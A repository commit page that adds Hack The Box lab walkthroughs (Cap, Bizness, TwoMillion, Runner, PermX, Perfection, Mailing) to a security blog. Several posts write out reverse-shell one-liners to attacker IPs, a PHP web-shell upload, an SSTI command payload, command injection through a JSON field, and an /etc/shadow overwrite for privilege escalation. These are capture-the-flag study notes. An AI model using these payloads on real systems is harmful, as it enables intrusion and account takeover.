mmckinnon/chirpy-starter
1
0
Fork 0
mirror of https://github.com/cotes2020/chirpy-starter.git synced 2025-04-12 07:33:27 +10:00
Code Issues Actions Packages Projects Releases Wiki Activity

update-2025

Browse Source
This commit is contained in:
racc0x 2025-02-03 22:22:27 -06:00
parent 46e2bdfa6e
commit 6278b1b310
495 changed files with 5669 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
_config.yml
View File

@ -9,37 +9,37 @@ theme: jekyll-theme-chirpy
lang: en
# Change to your timezone https://kevinnovak.github.io/Time-Zone-Picker
timezone:
timezone: America/Monterrey
# jekyll-seo-tag settings https://github.com/jekyll/jekyll-seo-tag/blob/master/docs/usage.md
# ↓ --------------------------
title: Chirpy # the main title
title: RaCc0x # the main title
tagline: A text-focused Jekyll theme # it will display as the subtitle
tagline: A blog about security, CTF writeups, Pro Labs, researches and more | Prepare for ECPPT, CPTS & OSCP certified
description: >- # used by seo meta and the atom feed
A minimal, responsive and feature-rich Jekyll theme for technical writing.
A blog about security, CTF writeups, Pro Labs, researches and more.
# Fill in the protocol & hostname for your site.
# E.g. 'https://username.github.io', note that it does not end with a '/'.
url: ""
url: "https://racc0x.github.io"
github:
username: github_username # change to your GitHub username
username: racc0x # change to your github username
twitter:
username: twitter_username # change to your Twitter username
username: dreii042 # change to your twitter username
social:
# Change to your full name.
# It will be displayed as the default author of the posts and the copyright owner in the Footer
name: your_full_name
email: example@domain.com # change to your email address
name: racc0x
email: racc0xyz@gmail.com # change to your email address
links:
# The first element serves as the copyright owner's link
- https://twitter.com/username # change to your Twitter homepage
- https://github.com/username # change to your GitHub homepage
- https://twitter.com/dreii042 # change to your twitter homepage
- https://github.com/racc0x # change to your github homepage
# Uncomment below to add more social links
# - https://www.facebook.com/username
# - https://www.linkedin.com/in/username
@ -98,7 +98,7 @@ theme_mode: # [light | dark]
cdn:
# the avatar on sidebar, support local or CORS resources
avatar:
avatar: "/assets/img/inspectorardilla.jpg"
# The URL of the site-wide social preview image used in SEO `og:image` meta tag.
# It can be overridden by a customized `page.image` in front matter.

135
_posts/2021-05-06-cap.md Normal file
View File

@ -0,0 +1,135 @@
---
title: HTB - Cap
date: 2021-05-06 00:00:00 +8000
categories: [hackthebox ]
tags: [HackTheBox, Information Disclosure, CVE-2021-4034, tcpdump]
image:
path: /assets/img/post/cap/Cap.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - Cap.
---
## Box Info
| Name | Cap |
| :-------------------- | ---------------: |
| Release Date | 5 Jun, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## Ping
```bash
ping -c 3 10.10.10.245
PING 10.10.10.245 (10.10.10.245) 56(84) bytes of data.
64 bytes from 10.10.10.245: icmp_seq=1 ttl=63 time=55.6 ms
64 bytes from 10.10.10.245: icmp_seq=2 ttl=63 time=55.9 ms
64 bytes from 10.10.10.245: icmp_seq=3 ttl=63 time=54.8 ms
```
`ttl=63 -> Linux System`
## Nmap
```bash
nmap -p- --open --min-rate 5000 -n -sS -vvv -Pn 10.10.10.245
```
```bash
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Sat, 22 May 2021 10:51:48 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Sat, 22 May 2021 10:51:42 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
...[snip]...
SF:eck\x20your\x20spelling\x20and\x20try\x20again\.</p>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```
![Image](../assets/img/post/cap/image.png)
data/1
![Image](../assets/img/post/cap/image-1.png)
I starter with a scan directoriy but dont foudn anything interesting
![Image](../assets/img/post/cap/image-2.png)
## Information Disclosure
```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u 'http://10.10.10.245/data/FUZZ' -fs 208
```
![Image](../assets/img/post/cap/image-3.png)
I download those and i test one by one to found sensitive data
![Image](../assets/img/post/cap/image-4.png)
```bash
tcpdump -qns 0 -X -r 0.pcap
```
**User:**
![Image](../assets/img/post/cap/image-5.png)
**Password:**
![Image](../assets/img/post/cap/image-6.png)
`nathan`
`Buck3tH4TF0RM3!`
**Login with ssh**
![Image](../assets/img/post/cap/image-7.png)
## Escalation Privilege | CVE-2021-4034
```BASH
find / -perm -4000 2>/dev/null
```
![Image](../assets/img/post/cap/image-8.png)
We found a bin interesting called pkexec. Looking if the pkexec has a vulnerability, i find a CVE-2021-4034
https://github.com/ly4k/PwnKit
We upload the file PwnKit and exploit as nathan and BOOM!
![Image](../assets/img/post/cap/image-9.png)
Pwned!!

94
_posts/2024-01-01-bizness.md Normal file
View File

@ -0,0 +1,94 @@
---
title: HTB - Bizness
date: 2024-08-13 12:17:34 -0400
categories: [hackthebox , Bizness]
tags: [hackthebox, Apache, OFBiz,dirsearch,nmap,cracking,enumeration,hashcat,htb-bizness,ctf,CVE-2023-49070,linux]
image:
path: /assets/img/post/bizness-card.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - Bizness.
---
## Box Info
| Name | Bizness |
| :-------------------- | ---------------: |
| Release Date | 06 Jan, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## Enumeration
```bash
nmap -p- --min-rate 5000 -n -sS -vvv -Pn 10.10.11.252 -oG allports
nmap -sCV -p 22,80,443,40117 10.10.11.252 -oN targeted
```
![Image](/assets/img/post/bizness1.png)
## Add the domain to /etc/hosts
```bash
echo "10.10.11.252 bizness.htb | sudo tee -a /etc/hosts/
```
![Image](/assets/img/post/bizness2.png)
## Brute Force Directory
```bash
dirsearch -u http://bizness.htb/
```
![Image](/assets/img/post/bizness3.png)
## OFBiz
The website is using a technology called `OFBiz` with version `18.12`, the current version is out date.
![Image](/assets/img/post/bizness4.png)
## Apache OFBiz 18.12 CVE-2023-49070
![Image](/assets/img/post/Bizness5.png)
[***Apache-OFBiz-Authentication-Bypass***](https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass)
We used the exploit to authenticate ourselves.
```bash
python3 exploit.py --url https://bizness.htb:443 --cmd 'nc -e /bin/bash 10.10.14.16 7777'
```
```bash
nc -lvnp 7777
```
![Image](/assets/img/post/bizness6.png)
## Enumeration linux
Before launching this search, I found a location where the OFBiz folder was located and performed searches that contain admin.
I searched recursively using grep, using options like -Rail, and to specify the word I used -e.
```shell
grep -Rail -e 'admin$' /top/ofbiz/runtime/data/derby/ofbiz/seg0
```
![Image](/assets/img/post/bizness7.png)
We came across a lot of data, so we have to go through each one by one.
We find a user and the hash
![Image](/assets/img/post/bizness8.png)
## Cracking Hash
We will use the Go hash matcher script to crack the password.
[**Go-Hash-Matcher**](https://github.com/IamLucif3r/Go-Hash-Matcher?source=post_page-----68713a41f98b--------------------------------)
![Image](/assets/img/post/bizness9.png)
Once we have the password, we log in at the `root`
![Image](/assets/img/post/bizness10.png)

214
_posts/2024-01-03-twomillion.md Normal file
View File

@ -0,0 +1,214 @@
---
title: HTB - TwoMillion
date: 2023-06-07 12:17:34 -0400
categories: [hackthebox , TwoMillion]
tags: [HackTheBox, API endpoints, API, CVE-2023-0386, nmap, web, rot13, curl,OverlaysFS Fuse]
image:
path: /assets/img/post/twomillion/twomillion-card.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - TwoMillion.
---
## Box Info
| Name | Bizness |
| :-------------------- | ---------------: |
| Release Date | 07 Jun, 2023 |
| OS | Linux |
| Rated Difficulty | Easy |
## Enumeration
### Nmap
```bash
nmap -p- --min-rate 5000 -n -sS -vvv -Pn 10.10.11.221 -oG allPorts
nmap -sCV -p 22,80 10.10.11.221 -oN targeted
```
![Image](/assets/img/post/twomillion/0.png)
### Resolution DNS
```bash
echo "10.10.11.221 twomillion.htb | sudo tee -a /etc/hosts"
```
![Image](/assets/img/post/twomillion/1.png)
## Web
When hover the mouse over "`here`" show it us the link to goes.
![Image](/assets/img/post/twomillion/2.png)
Looking in dom i found this path from a API and the instruction of how script works
![Image](/assets/img/post/twomillion/3.png)
![Image](/assets/img/post/twomillion/4.png)
Url decode for read more comfort:
```js
function verifyInviteCode(code){
var formData = {"code":code};
$.ajax({
type: "POST",
url: '/api/v1/invite/verify',
dataType: 'json',
data: formData,
success: function(response){
console.log(response);
},
error: function(response){
console.log(response);
}
});
}
function makeInviteCode(){
$.ajax({
type: "POST",
url: '/api/v1/invite/how/to/generate',
dataType: 'json',
success: function(response){
console.log(response);
},
error: function(response){
console.log(response);
}
});
}
```
Theres a interesting function called makeInviteCode so we gonna execute this function on console from inspection web.
![Image](/assets/img/post/twomillion/5.png)
If i click in the object it show us something interesting encrypte in `ROT13`
![Image](/assets/img/post/twomillion/6.png)
We can decrypt rot13 with some web page for that
![Image](/assets/img/post/twomillion/7.png)
`"In order to generate the invite code, make a POST request to /api/invite/generate"`
```bash
curl -s -X POST "http://2million.htb/api/v1/invite/generate"
```
With `curl` can send a POST method for generate the invite code.
![Image](/assets/img/post/twomillion/8.png)
And the API it generate us an code in base64, it can decrypt with base64[^code] and use it for registration us web and login.
![Image](/assets/img/post/twomillion/9.png)
![Image](/assets/img/post/twomillion/10.png)
Looking in the web, I found a path in api/v1
![Image](/assets/img/post/twomillion/11.png)
## API
Abusing again the API we send a request in method GET with the Cookie
```bash
`curl -s -X GET "http://2million.htb/api/v1" -H "Cookie: PHPSESSID=avhllptt4vvs1rbocvart3ue9b"`
```
![Image](/assets/img/post/twomillion/12.png)
```bash
curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json" | jq
```
![Image](/assets/img/post/twomillion/13.png)
```bash
curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json" -d '{"email": "jack@jack.com"}' | jq
```
![Image](/assets/img/post/twomillion/14.png)
```bash
curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json" -d '{"email": "jack@jack.com", "is:admin": "True"}' | jq
```
![Image](/assets/img/post/twomillion/15.png)
```bash
curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json" -d '{"email": "jack@jack.com", "is:admin": "1"}' | jq
```
![Image](/assets/img/post/twomillion/16.png)
```bash
curl -s -X GET "http://2million.htb/api/v1/admin/auth" -H "Cookie: PHPSESSID="
```
![Image](/assets/img/post/twomillion/17.png)
```bash
curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json' -d '{"username": "jack"}' | jq
```
![Image](/assets/img/post/twomillion/18.png)
![Image](/assets/img/post/twomillion/19.png)
```bash
curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json' -d '{"username": ";whoami;"}'
```
![Image](/assets/img/post/twomillion/20.png)
```bash
curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json' -d '{"username": ";ls;"}'
```
![Image](/assets/img/post/twomillion/21.png)
```bash
curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json' -d '{"username": ";bash -c \"bash -i >& /dev/tcp/10.10.14.88/443 0>&1\" #"}'
```
![Image](/assets/img/post/twomillion/22.png)
```bash
rlwrap nc -lvnp 443
```
![Image](/assets/img/post/twomillion/23.png)
Enumerate linux we can see a folder with the name .env this contain a credentials in plane text. We are a www-data so we need
![Image](/assets/img/post/twomillion/24.png)
admin SuperDuperPass123
When we login the first appear is mail, this mail is lcoated in /var/mail
![Image](/assets/img/post/twomillion/25.png)
## CVE-2023-0386
Well, the mail says everything... Google it.
![Image](/assets/img/post/twomillion/26.png)
Search in google "OverlaysFS Fuse linux kernel and the fisrt poc i found is this `CVE-2023-0386`[^cve]
![Image](/assets/img/post/twomillion/27.png)
ROOT
### Source
[^code]: <https://www.base64decode.org/>
[^cve]: <https://github.com/sxlmnwb/CVE-2023-0386>

157
_posts/2024-01-04-runner.md Normal file
View File

@ -0,0 +1,157 @@
---
title: HTB - Runner
date: 2023-06-07 12:17:34 -0400
categories: [hackthebox , Runner]
tags: [HackTheBox, Port Forwarding, wfuzz, TeamCity, ssh, john, chisel, portainer, docker,fuzz]
image:
path: /assets/img/post/runner/runner-card.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - Runner.
---
## Box Info
| Name | Bizness |
| :-------------------- | ---------------: |
| Release Date | 08 Jun, 2024 |
| OS | Linux |
| Rated Difficulty | Medium |
## Enumeration
### Nmap
![Image](/assets/img/post/runner/0.png)
### Resolution DNS
```bash
echo "10.10.11.13 runner.htb | sudo tee -a /etc/hosts
```
### Scanning SubDomain
```bash
wfuzz -c -w /usr/share/wordlists/amass/shubs-subdomains.txt --hc 400,404,403,302 -H "Hosts: FUZZ.runner.htb" -u http://runner.htb -t 100
```
![Image](/assets/img/post/runner/1.png)
```bash
Whatweb http://runner.htb
```
## CVE-2023-42793 for Jet Brains
We can see the version of `TeamCity build management server`.
![Image](/assets/img/post/runner/2.png)
Googling `Teamcity 2023.05.3` exploit i found a `RCE` vulnerability for it.
![Image](/assets/img/post/runner/3.png)
PoC[^poc]: <https://github.com/Zyad-Elsayed/CVE-2023-42793>
```bash
python3 exploit.py -u http://teamcity.runner.htb -n test2 -p test122 -e test2@test.com
```
![Image](/assets/img/post/runner/4.png)
The script exploits to create an admin account on a TeamCity server. It sends a POST request to the target URL to create an admin user with specified or random credentials.
![Image](/assets/img/post/runner/5.png)
## SSH
Once inside, I enumerate these sections and found in Diagnostics make a backup and storage in a zip file and can we display the folders and found id_rsa.
![Image](/assets/img/post/runner/6.png)
We go to download and save for login with ssh.
![Image](/assets/img/post/runner/7.png)
Wait.. but dont have a user for login with ssh...
![Image](/assets/img/post/runner/8.png)
We also found users and there hashes in same folder.
![Image](/assets/img/post/runner/9.png)
## Crack Hash
We go to crack the password for it.
![Image](/assets/img/post/runner/10.png)
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt hash.txt
```
Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3]) Remaining 1 password hash Cost 1 (iteration count) is 128 for all loaded hashes Will run 2 OpenMP threads
Password: `piper123`
Till now we have one id_rsa file, two users (Methew, jhon),password for Methew.
`ssh -i id_rsa john@10.10.11.13`
![Image](/assets/img/post/runner/12.png)
![Image](/assets/img/post/runner/11.png)
## Port Forwarding
```bash
netstat -nltp
ss -nltpu
```
127.0.0.1:9000 its potential, Ill be employing Chisel for port forwarding.
![Image](/assets/img/post/runner/13.png)
```bash
chisel server -p 6150 --reverse (Attack Machine)
./chisel client 10.10.14.68:6150 R:9000:127.0.0.1:9000 (Victim machine)
```
![Image](/assets/img/post/runner/14.png)
We go to our port 9000
![Image](/assets/img/post/runner/15.png)
## Docker
Login with credentials `matthew` - `piper123`
<https://nitroc.org/en/posts/cve-2024-21626-illustrated/#how-docker-engine-calls-runc>
![Image](/assets/img/post/runner/16.png)
## CVE-2024-21626 for Docker
![Image](/assets/img/post/runner/17.png)
the path `/proc/self/id/8` is from the [CVE-2024-21626](https://nitroc.org/en/posts/cve-2024-21626-illustrated/#how-docker-engine-calls-runc) - [PoC - GitHub](https://github.com/NitroCao/CVE-2024-21626?tab=readme-ov-file)
![Image](/assets/img/post/runner/18.png)
Now we go to console
![Image](/assets/img/post/runner/19.png)
Execute a `/bin/bash` as root
![Image](/assets/img/post/runner/20.png)
Just login as root and look the folder `root` for the flag
![Image](/assets/img/post/runner/21.png)
Root
#### Source
[^poc]: <https://github.com/Zyad-Elsayed/CVE-2023-42793>

167
_posts/2024-01-05-permx.md Normal file
View File

@ -0,0 +1,167 @@
---
title: HTB - PermX
date: 2023-06-07 12:17:34 -0400
categories: [hackthebox , PermX]
tags: [HackTheBox,Chamilo LMS,CVE-2023-4220,mysql,symlink,curl ]
image:
path: /assets/img/post/permx/PermX.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - PermX.
---
## Box Info
| Name | Bizness |
| :-------------------- | ---------------: |
| Release Date | 20 Jun, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## Enumeration
### Nmap
![Image](/assets/img/post/permx/image.png)
#### whatweb:
![Image](/assets/img/post/permx/2.png)
#### Wappalyzer
![Image](/assets/img/post/permx/4.png)
### Web
![Image](/assets/img/post/permx/3.png)
#### Brute Forcing directory
I use
```bash
dirsearch -u http://permx.htb/
```
but i dont find anything interesting, So i use the Scan for Subdomain
#### SubDomain
```bash
wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --hc 400,403,404,302 -H "Host: FUZZ.permx.htb" -u http://permx.htb -t 100
```
![Image](/assets/img/post/permx/5.png)
Search for chamilo in google.
### Chamilo LMS - CVE-2023-4220
![Image](/assets/img/post/permx/6.png)
RCE:
```bash
echo '<?php system("bash -c 'bash -i >& /dev/tcp/10.10.10.13/9001 0>&'"); ?>' > rce.php
```
```bash
curl -F 'bigUploadFile=@rce.php' 'http://<chamilo>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
`The file has successfully been uploaded.`
```
```bash
curl 'http://<chamilo>/main/inc/lib/javascript/bigupload/files/rce.php'
`uid=33(www-data) gid=33(www-data) groups=33(www-data)`
```
![Image](/assets/img/post/permx/7.png)
We go to open the file through web.
![Image](/assets/img/post/permx/8.png)
Execute the file .php `http://lms.permx.htb//main/inc/lib/javascript/bigupload/files/rce.php` with `lvwrap nc -lvnp 7777` listening for get the reverse shell
![Image](/assets/img/post/permx/9.png)
taadaaa... Well, we login as `www-data` and we go to enumerate...
I found in config folder a file `configuration.php` and show it us a user and password.
Till now we have one user:`chamilo` and password:`03f6lY3uXAP2...`.
![Image](/assets/img/post/permx/10.png)
`netstat -nlp` or `netstat -ano` and we see one port strange and is port 3306 it is open for the database.
![Image](/assets/img/post/permx/11.png)
Use the mysql inside in the victim machine.
```bash
mysql -uchamilo -p and the password 03F6lY3uXAP2bkW8
```
![Image](/assets/img/post/permx/12.png)
```text
show databases;
use chamilo;
describe user;
select user_id,username,firstname,lastname,password,salt from user;
```
![Image](/assets/img/post/permx/13.png)
We login with ssh `mtz@permx.htb` and password `03F6lY3uXAP2bkW8`
![Image](/assets/img/post/permx/14.png)
`sudo -l`
![Image](/assets/img/post/permx/15.png)
## Symlink (Symbolic Link Attack)
The directory `/etc/init.d`{: .filepath} is home to **scripts** for System V init (SysVinit), the **classic Linux service management system**. It includes scripts to `start`, `stop`, `restart`, and sometimes `reload` services. These can be executed directly or through symbolic links found in `/etc/rc?.d/`{: .filepath}. An alternative path in Redhat systems is `/etc/rc.d/init.d`{: .filepath}.
Its main function is to change all file permissions, but it must be in the `/home/mtz` directory.
![Image](/assets/img/post/permx/16.png)
[Symlink Español](https://www.freecodecamp.org/espanol/news/tutorial-de-enlace-simbolico-en-linux-como-crear-y-remover-un-enlace-simbolico/)
[Symlink Hacktricks](https://book.hacktricks.xyz/pentesting-web/file-upload#symlink)
```bash
link soft / to cc
ln -s / cc
```
Create a folder that points to the root path with Symlink with the -s (soft) option to locate ourselves inside it and make changes to `/etc/shadow`{: .filepath} (root password) with a password that we create ourselves (cccc).
![Image](/assets/img/post/permx/17.png)
The `/etc/shadow`{: .filepath} storage the password of root
```bash
sudo /opt/acl.sh mtz rwx /home/mtz/etc/shadow (execute the script for change the permissions)
```
![Image](/assets/img/post/permx/18.png)
Generated a password for remplace the root password in `/etc/shadow`{: .filepath}
```bash
openssl passwd -6 cccc
```
![Image](/assets/img/post/permx/19.png)
and copy and paste en the file `"shadow"`
```bash
echo 'root: {password generate}:19871:0:99999:7:::' > /home/mtz/cc/etc/shadow
```
Login as root with password cccc
![Image](/assets/img/post/permx/20.png)
`Root`

131
_posts/2024-01-06-perfection.md Normal file
View File

@ -0,0 +1,131 @@
---
title: HTB - Perfection
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Perfection]
tags: [HackTheBox, SSTI, sudo, nmap, hashcat ]
image:
path: /assets/img/post/perfection/Perfection.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - Perfection.
---
## Box Info
| Name | Perfection |
| :-------------------- | ---------------: |
| Release Date | 02 Mar, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## Enumeration
```bash
nmap -p- --open --min-rate 5000 -n -sS -vvv -Pn 10.10.11.253 -oG allPorts
nmap -sCV -p 22,80 10.10.11.253 -oN targeted
```
![Image](/assets/img/post/perfection/0.png)
#### Resolution DNS
```bash
echo "10.10.11.253 perfection.htb" | sudo tee -a /etc/hosts
```
#### Technology
```text
whatweb http://perfection.htb
```
![Image](/assets/img/post/perfection/1.png)
## Web
![Image](/assets/img/post/perfection/2.png)
The web is powered by WEBrick version 1.7.0, `WEBrick is a Ruby library providing simple HTTP web servers`{: filepath}
![Image](/assets/img/post/perfection/3.png)
Well, if you intercept the request u can see something like this `category1=literature` but if u try to this `category1=$` get a redirect with a text "Malicious text blocked".
We can do with ffuf an scan for get a list of blocked characters.
```bash
ffuf -u http://10.10.11.253/weighted-grade-calc -d 'category1=FUZZ&grade1=90&weight1=30&category2=poop&grade2=100&weight2=50&category3=poop&grade3=100&weight3=20&category4=N%2FA&grade4=0&weight4=0&category5=N%2FA&grade5=0&weight5=0' -w /opt/SecLists/Fuzzing/alphanum-case-extra.txt -mr Malicious
```
But what happens if a url encode the input?
```text
category1= poop%0aFUZZ &grade1=90&weight1=30&category2=poop&grade2=100&weight2=50&category3=poop&grade3=100&weight3=20&category4=N%2FA&grade4=0&weight4=0&category5=N%2FA&grade5=0&weight5=0' -w /opt/SecLists/Fuzzing/alphanum-case-extra.txt -mr Malicious
```
`%0a`— represents a newline character, used to `bypass input validation`.
The first thing I think is that there may be an SSTI.
We go look to in payloadallthethings if there is something for ruby
[PaylaodsAllTheThings-Ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby---basic-injections)
![Image](/assets/img/post/perfection/pay.png)
`hURL` _to encode and decode payloads showcases the manipulation of data to exploit web application vulnerabilities. The payload crafted for the Weighted Grade Calculator application is designed to execute a reverse shell command, taking advantage of any potential server-side code execution vulnerabilities_
```shell
hURL -B "bash -i >& /dev/tcp/10.10.14.78/7777 0>&1" (base64)
```
```shell
hURL -U "{_stringbase64_}" (URLencoded)
```
![Image](/assets/img/post/perfection/5.png)
#### Payload
```text
category1=poop%0a<%25=system("echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC40OC83Nzc3IDA%2BJjE%3D|+base64+-d+|+bash");%25>1
```
![Image](/assets/img/post/perfection/6.png)
Or use the payload `<%= IO.popen('id').readlines() %>` and urlencoded.
![Image](/assets/img/post/perfection/IO.png)
[Hacktricks-SSTI](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#erb-ruby)
```bash
<%= IO.popen('bash -i >& /dev/tcp/10.10.14.78/7777 0>&1').readlines() %>
```
![Image](/assets/img/post/perfection/7.png)
Enumerating found the file .db and got the credentials.
_A string is any sequence of 4 or more printable characters .db_
![Image](/assets/img/post/perfection/8.png)
## Privilege Escalation
![Image](/assets/img/post/perfection/9.png)
### Hashcat
```bash
hashcat -m 1400 hash.txt -a 3 "susan_nasus_?d?d?d?d?d?d?d?d"
```
![Image](/assets/img/post/perfection/10.png)
![Image](/assets/img/post/perfection/11.png)
```text
susan_nasus_413759210
```
![Image](/assets/img/post/perfection/12.png)
Root

245
_posts/2024-01-07-mailing.md Normal file
View File

@ -0,0 +1,245 @@
---
title: HTB - Mailing
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Mailing]
tags: [HackTheBox, Impacket, wmiexec, NTLM, CVE-2024-21413, telnet, Evil-winrm, smb, more, nmap, hashcat, Dump Sam Hash, ]
image:
path: /assets/img/post/mailing/Mailing-card.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - Mailing.
---
## Box Info
| Name | Mailing |
| :-------------------- | ---------------: |
| Release Date | 02 Mar, 2024 |
| OS | Windows |
| Rated Difficulty | Easy |
## **Enumeration**
```bash
nmap -p- --open --min-rate 5000 -sS -n -vvv -Pn 10.10.11.14 -oG allPorts
```
![Image](/assets/img/post/mailing/1.png)
![Image](/assets/img/post/mailing/2.png)
ExtractPorts
```bash
nmap -sCV -p 25,80,110,135,139,143,445,465,587,993,5040,5985,7680,47001... 10.10.11.14 -oN targeted
```
![Image](/assets/img/post/mailing/3.png)
![Image](/assets/img/post/mailing/4.png)
![Image](/assets/img/post/mailing/5.png)
#### **Adding Domain to Hosts File**
```bash
echo "10.10.11.14 mailing.htb" | sudo tee -a /etc/hosts
```
![Image](/assets/img/post/mailing/6.png)
![Image](/assets/img/post/mailing/7.png)
## **Information Gathering**
Below the website you can download a pdf file.
![Image](/assets/img/post/mailing/8.png)
the file download has this potential `LFI`
![Image](/assets/img/post/mailing/9.png)
### Directory Brute Forcing
Dirsearch
![Image](/assets/img/post/mailing/10.png)
Or with curl -I can give you something interesting
`curl -I <http://mailing.htb/`>
![Image](/assets/img/post/mailing/11.png)
## **Exploitation**
Our first foothold is the **LFI** found. We go to intercept the request and see what we can do.
`/download.php?file=../../windows/system32/drivers/etc/hosts`{: filepath}
![Image](/assets/img/post/mailing/12.png)
We will try to point to the hosts file to confirm if we are against an LFI.
After exploring the folder structure of hMailServer and asking ChatGPT what should be inside, I found the `hMailServer.INI` file in the `bin` folder and `hmailserver_awstats.log` in the `logs` folder. [Structure folder from hMailServer](https://www.hmailserver.com/documentation/v4.4/?page=folderstructure)
I accessed the logs to determine which emails I can access.
![Image](/assets/img/post/mailing/13.png)
In the `hMailServer.INI` file, I found the passwords for the admin and the database
![Image](/assets/img/post/mailing/14.png)
Using a hash identifier to determine the type of hash before attempting to crack it
![Image](/assets/img/post/mailing/15.png)
